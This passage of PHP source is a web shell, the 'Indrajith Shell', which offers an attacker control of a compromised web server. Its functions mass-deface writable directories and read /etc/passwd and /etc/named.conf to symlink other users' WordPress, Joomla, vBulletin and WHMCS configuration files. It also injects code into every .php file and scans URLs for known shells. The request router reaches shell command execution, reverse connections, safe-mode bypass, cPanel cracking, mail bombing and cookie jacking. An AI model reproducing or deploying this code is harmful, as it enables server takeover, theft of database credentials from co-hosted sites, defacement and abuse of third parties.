echo "<div id=result><center><h2>Mass Deface</h2><hr /><br /><br /><table class=tbl><form method='GET'><input name='mm_path' type='hidden' value=".$_GET['path']."><tr><td>Name : <input size=40 name='mass_name'></td></tr>
<tr><td><textarea name='mass_cont' cols=80 rows=25 class='textarea_edit'></textarea></td></tr><tr><td><input class='input_big' type=submit value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
}
function mass_deface_bg()
{
global $sep;
$d_path=$_GET['mm_path'];
chdir($d_path);
$d_file=$_GET['mass_name'];
$d_conten=$_GET['mass_cont'];
if(is_dir($d_path))
{
chdir($d_path);
$d_dirs=array();
if($handle=opendir($d_path))
{
while(($item=readdir($handle))!==FALSE)
{
if($item=="."){continue;}
if($item==".."){continue;}
if(is_dir($item))
{
array_push($d_dirs, $item);
}
}
}
}
echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=tbl>";
foreach($d_dirs as $d_dir)
{
$xd_path=getcwd()."$sep$d_dir$sep$d_file";
if(is_writable($d_dir))
{
$handle=fopen($xd_path, "wb");
if($handle)
{
fwrite($handle, $d_conten);
}
}
echo "<tr><td><font color=green>$xd_path</font></td></tr>";
}
echo "</table><br /><br /><hr /><br /><br /></div>";
}
function symlinkg($usernamexx,$domainxx)
{
symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt');
symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt');
symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt');
symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt');
symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt');
symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt');
symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt');
symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt');
symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt');
symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt');
symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt');
symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt');
symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt');
symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt');
symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt');
symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt');
symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt');
symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt');
symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt');
symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt');
symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt');
symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt');
symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt');
symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt');
symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt');
symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt');
symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt');
symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt');
symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt');
symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt');
symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt');
}
function config_grabber_bg()
{
global $sym_htaccess,$sym_php_ini;
mkdir('INDRAJITH', 0777);
symlink("/", "INDRAJITH/root");
$htaccess=fopen('INDRAJITH/.htaccess', 'wb');
fwrite($htaccess,$sym_htaccess);
$php_ini_x=fopen('INDRAJITH/php.ini', 'wb');
fwrite($php_ini_x, $sym_php_ini);
$usr=explode("\n",$_POST['user_z_list']);
foreach($usr as $uzer)
{
$u_er=trim($uzer);
symlinggg($u_er);
}
echo "<script>window.open('INDRAJITH/', '_blank');</script>";
alert('Config Grab compted. Check configs in direcory INDRAJITH');
}
if(isset($_POST['user_z_list']))
{
config_grabber_bg();
}
function config_grabber_ui()
{
if(file('/etc/passwd'))
{
?><script>alert("/etc/named.conf Not Found, Its alternative method.");</script><div id=result><center><h2>Config Grabber</h2><hr /><br /><br /><table class=tbl><form method=POST><tr><td><textarea spellcheck=false class='textarea_edit' rows=15 cols=60 name=user_z_list><?php
$users = file('/etc/passwd');
foreach($users as $user)
{
$user = explode(':', $user);
echo $user[0]."\n";
}
?></textarea></td></tr><tr><td><input type='submit' class='input_big' value=' >> '/></td></tr></form></table><br /><br /><hr /><br /><br /><hr /></div><?php
}
else
{
alert(" File Not Found : /etc/passwd ");
}
}
function symlinggg($user)
{
symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php', "INDRAJITH/".$user." =>blog/configuration.php");
symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php");
symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php");
symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php");
symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php");
symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php");
symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php");
symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php");
symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php");
symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php");
symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php");
symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php");
symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php");
symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php");
symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php");
symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php");
symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php");
symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php");
symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php");
symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php");
symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php");
symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php");
symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php");
symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php");
symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php");
symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php");
}
function sym_xxx()
{
global $sym_htaccess,$sym_php_ini;
mkdir('Indrajith', 0777);
symlink("/", "Indrajith/root");
$htaccess=@fopen('Indrajith/.htaccess', 'w');
fwrite($htaccess,$sym_htaccess);
$php_ini_x=fopen('Indrajith/php.ini', 'w');
fwrite($php_ini_x, $sym_php_ini);
$akps = implode(file("/etc/named.conf"));
if(!$akps)
{
config_grabber_ui();
}
else
{
$usrd = array();
foreach($akps as $akp)
{
if(eregi("zone", $akp))
{
preg_match_all('#zone "(.*)" #', $akp, $akpzz);
flush();
if(strlen(trim($akpzz[1][0]))>2)
{
$user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
symlinkg($akpzz[1][0],$user['name']);
flush();
}
}
}
}
}
function sym_link()
{
global $sym_htaccess,$sym_php_ini;
cmd('rm -rf AKP');
mkdir('AKP', 0755);
$usrd = array();
$akps = implode(file("/etc/named.conf"));
$htaccess=fopen('AKP/.htaccess', 'w');
fwrite($htaccess,$sym_htaccess);
$php_ini_x=fopen('AKP/php.ini', 'w');
fwrite($php_ini_x, $sym_php_ini);
symlink("/", "AKP/root");
if(!$file)
{
echo "<script>alert('Bind File /etc/passwd Not Found. Its alternative Method')</script>";
echo "<div id=result><center><h2>SymLink</h2></center><hr /><br /><br /><table class='table'><tr><th>Users</th><th>Exploit</th></tr>";
$users = file('/etc/passwd');
foreach($users as $user)
{
$user = explode(':', $user);
echo "<tr><td>".$user[0]."</td><td><a href='AKP/root/home/".$user[0]."/public_html/' target=_blank>SymLink</tr>";
}
echo "</table><br /><br /><hr /><br /><br /></div>";
}
else
{
echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
foreach($akps as $akp)
{
if(eregi("zone", $akp))
{
preg_match_all('#zone "(.*)" #', $akp, $akpzz);
flush();
if(strlen(trim($akpzz[1][0]))>2)
{
$user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href='AKP/root/home/".$user['name']."/public_html/' target=_blank>SymLink</a></td></tr></table>";
flush();
}
}
}
}
}
function shell_finder_ui()
{
echo "<div id=result><center><h2>SH3LL SCANNER</h2><hr /><br /><br /><br /><form method='GET'>URL : <input size=50 name='sh311_scanx' value='http://www.ajithkp560.hostei.com/PHP/'><input type='submit' value=' >> ' /></form><br /><br /><hr /><br /><br />";
}
function shell_finder_bg()
{
$sh_url=$_GET['sh311_scanx'];
echo "<div id=result><center><h2>SHELL SCAN</h2><hr /><br /><br /><table class='table'>";
$ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
foreach($ShellZ as $shell)
{
$urlzzx=$sh_url.$shell;
if(function_exists('curl_init'))
{
echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
$ch = curl_init($urlzzx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($status_code==200)
{
echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
}
else
{
echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
}
}
else
{
echo "<font color=red>cURL Not Found </font>";
break;
}
}
echo "</table><br /><br /><hr /><br /><br /></div>";
}
function code_in_ui()
{
global $sep;
$mode=$_POST['modexxx'];
$ftype=$_POST['ffttype'];
$c_cont=$_POST['code_cont'];
$ppp=$_POST['path'];
if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="")
{
echo "<div id=result><center><h2>Successfully c0d3 inj3cted</h2></center><table class=tbl>";
switch($mode)
{
case "Apender":
$mmode="a";
break;
case "Rewrite":
$mmode="w";
break;
}
if($handle = opendir($ppp))
{
while(($c_file = readdir($handle)) !== False)
{
if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1))
{
echo "<tr><td><font color=red>$ppp$sep$c_file</font></td></tr>";
$fd = fopen($ppp.$sep.$c_file,$mmode);
if($fd)
{
fwrite($fd,$c_cont);
}
else
{
alert("Error. Access Denied");
}
}
}
}
echo "</table><br /><br /><hr /><br /><br /></div>";
}
else
{
?>
<div id=result><center><h2>c0de inj3ct</h2></center><hr /><br /><br /><table class=table><form method='POST'><input type='hidden' name='path' value="<?php echo getcwd(); ?>"><tr><td>Mode : </td>
<td><select style='color:green; background-color:black; border:1px solid #666;' name='modexxx'><option>Apender</option><option>Rewrite</option></select></td></tr><tr><td>File Type</td><td><input name='ffttype' value='.php' size=50></td></tr>
<tr><td>Content : </td><td><textarea name='code_cont' rows=20 cols=60 class='textarea_edit'></textarea></td></tr><tr><td></td><td><input type=submit value=' >> ' class='input_big' /></td></tr></form></table><br /><br /><hr /><br /><br />
<?php
}
}
function ssh_man_ui()
{
?>
<div id=result><center><h2>SSH Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ssh_host'></td></tr><tr><td>Username : </td><td><input size=50 name='ssh_user'></td></tr><tr><td>Password : </td><td><input size=50 name='ssh_pass'></td></tr><tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
<?php
}
function ssh_man_bg()
{
$ssh_h=$_GET['ssh_host'];
$ssh_u=$_GET['ssh_user'];
$ssh_p=$_GET['ssh_pass'];
if(!function_exists('ssh2_connect'))
{
alert("Sorry, Function ssh2_connect is not found");
}
$conn=ssh2_connect($ssh_h, 22);
if(!$conn)
{
alert("SSH Host Not Found");
}
$log=ssh2_auth_password($conn, $ssh_u, $ssh_p);
if(!$log)
{
alert("SSH Authorication failed");
}
$shell=ssh2_shell($conn, "bash");
if($_GET['ssh_cmd']!="" && $_GET['ssh_cmd'])
{
$ssh_cmd=$_GET['ssh_cmd'];
fwrite($shell, $ssh_cmd);
sleep(1);
while($line=fgets($shell))
{
flush();
echo $line."\n";
}
?>
<div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
<form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
<?php
}
else
{
?>
<div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
<form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
<?php
}
}
function ftp_man_ui()
{
?>
<div id=result><center><h2>FTP Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ftp_host'></td></tr>
<tr><td>Username : </td><td><input size=50 name='ftp_user'></td></tr>
<tr><td>Password : </td><td><input size=50 name='ftp_pass'></td></tr>
<tr><td>Path [<font color=red>Optional</font>] : </td><td><input name='fpath' size=50></td></tr>
<tr><td>Upload File From Server [<font color=red>Optional</font>] : </td><td><input name='upload_file' size=50></td></tr>
<tr><td>Download File To Server [<font color=red>Optional</font>] : </td><td><input name='download_file' size=50></td></tr>
<tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
<?php
}
function ftp_man_bg()
{
echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
$fhost=$_GET['ftp_host'];
$fuser=$_GET['ftp_user'];
$fpass=$_GET['ftp_pass'];
$fpath=$_GET['fpath'];
$upl=$_GET['upload_file'];
$down=$_GET['download_file'];
if($fpath=="")
{
$fpath=ftp_pwd($conn);
}
$conn=ftp_connect($fhost);
if(!$conn)
{
alert("FTP Host Not Found!!!");
}
$log=ftp_login($conn, $fuser, $fpass);
if(!$log)
{
alert("FTP Authorication Failed");
}
if($upl!="")
{
$fp = fopen($upl, 'r');
if (ftp_fput($conn, $upl, $fp, FTP_ASCII))
{
echo "<center><font color=green>Successfully uploaded <font color=red> $upl </font> </font></center>";
}
else
{
echo "<center><font color=red>There was a problem while uploading <font color=green> $upl </font> </font></center>";
}
}
if($down!="")
{
$handle = fopen($down, 'w');
if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0))
{
echo "<center><font color=green>successfully written to <font color=red> $down </font> </font></center>";
}
else
{
echo "<center><font color=red>There was a problem while downloading <font color=green> $down </font> to <font color=green> $down </font> </font></center>";
}
}
echo "<table class='table'><tr><th>Files</th>";
ftp_chdir($fpath);
$list=ftp_rawlist($conn, $fpath);
foreach($list as $fff)
{
echo "<tr><td><pre>$fff</pre></td></tr>";
}
echo "</table></div>";
}
//////////////////////////////// Frond End Calls ///////////////////////////////
if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
{
edit_file_bg();
}
else if(isset($_REQUEST['sh311_scanner']))
{
shell_finder_ui();
}
else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
{
ftp_man_bg();
}
else if(isset($_REQUEST['ftpman']))
{
ftp_man_ui();
}
else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
{
ssh_man_bg();
}
else if(isset($_REQUEST['sshman']))
{
ssh_man_ui();
}
else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
{
chdir($_GET['path']);
code_in_ui();
}
else if(isset($_GET['sh311_scanx']))
{
shell_finder_bg();
}
else if(isset($_REQUEST['config_grab']))
{
sym_xxx();
}
else if(isset($_REQUEST['ftp_man']))
{
ftp_man_ui();
}
else if(isset($_REQUEST['mass_xploit']))
{
mass_deface_ui();
}
else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
{
ftp_man_bg();
}
else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
{
mass_deface_bg();
}
else if(isset($_REQUEST['ftp_anon_scan']))
{
ftp_anonymous_ui();
}
else if(isset($_GET['ftp_anonz']))
{
ftp_anonymous_bg();
}
else if(isset($_REQUEST['killme']))
{
killme();
}
else if(isset($_REQUEST['hexenc']))
{
hex_encode_ui();
}
else if(isset($_REQUEST['remotefiledown']))
{
remote_download_ui();
}
else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
{
remote_download_bg();
}
else if(isset($_REQUEST['cpanel_crack']))
{
cpanel_crack();
}
else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
{
remote_file_check_bg();
}
else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
{
php_ende_bg();
}
else if(isset($_REQUEST['remote_server_scan']))
{
remote_file_check_ui();
}
else if(isset($_REQUEST['server_exploit_details']))
{
exploit_details();
}
else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
{
massmailer_bg();
}
else if(isset($_REQUEST['mysqlman']))
{
mysqlman();
}
else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
{
mailbomb_bg();
}
else if(isset($_REQUEST['cookiejack']))
{
cookie_jack();
}
else if(isset($_REQUEST['massmailer']))
{
massmailer_ui();
}
else if(isset($_REQUEST['rename']))
{
chdir($_GET['path']);
rename_ui();
}
else if(isset($_GET['old_name']) && isset($_GET['new_name']))
{
chdir($_GET['path']);
rename_bg();
}
else if(isset($_REQUEST['encodefile']))
{
php_ende_ui();
}
else if(isset($_REQUEST['edit']))
{
edit_file();
}
else if(isset($_REQUEST['down']) && isset($_REQUEST['path']))
{
download();
}
else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path']))
{
download_gzip();
}
else if(isset($_REQUEST['read']))
{
chdir($_GET['path']);
code_viewer();
}
else if(isset($_REQUEST['perm']))
{
chdir($_GET['path']);
ch_perm_ui();
}
else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
{
chdir($_GET['path']);
ch_perm_bg();
}
else if(isset($_REQUEST['del_fil']))
{
chdir($_GET['path']);
delete_file();
exit;
}
else if(isset($_REQUEST['phpinfo']))
{
chdir($_GET['path']);
ob_clean();
echo phpinfo();
exit;
}
else if(isset($_REQUEST['del_dir']))
{
chdir($_GET['path']);
$d_dir=$_GET['del_dir'];
deldirs($d_dir);
}
else if(isset($_GET['path']) && isset($_GET['new_file']))
{
chdir($_GET['path']);
mk_file_ui();
}
else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
{
mk_file_bg();
}
else if(isset($_GET['path']) && isset($_GET['new_dir']))
{
chdir($_GET['path']);
create_dir();
}
else if(isset($_GET['path']) && isset($_GET['cmdexe']))
{
chdir($_GET['path']);
cmd();
}
else if(isset($_POST['upload_f']) && isset($_POST['path']))
{
upload_file();
}
else if(isset($_REQUEST['rs']))
{
reverse_conn_ui();
}
else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
{
reverse_conn_bg();
}
else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
{
chdir($_GET['path']);
safe_mode_fuck_ui();
}
else if(isset($_GET['path']) && isset($_GET['safe_mode']))
{
safe_mode_fuck();
}
else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
{
AccessDenied();
}
else if(isset($_REQUEST['symlink']))
{
sym_link();
}
else if(isset($_GET['path']) && isset($_GET['copy']))
{
copy_file_ui();
}
else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
{
copy_file_bg();
}
else
{
filemanager_bg();
}
////////////////////////////// End Frond End Calls //////////////////////////////
echo "</div><div id=result><center><p><table class='tbl'>
<tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value=' >> ' /></form></td></tr></table>
<table class='tbl'><tr>
<td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value=' >> ' ><input size='40' name='new_file' /></form>
</td>
<td><form style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value=' >> ' /><span> : New Dir</span></form>
</td>
</tr>
<tr>
<td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value=' >> ' ><input name='cmdexe' size='40' /></form>
</td>
<td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value=' >> ' /><span> : Upload File</span></form>
</td>
</tr>
</table></p><p><font size=4 color=green>© <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> ©</font><br />® TOF [2012] ®</div>"
?>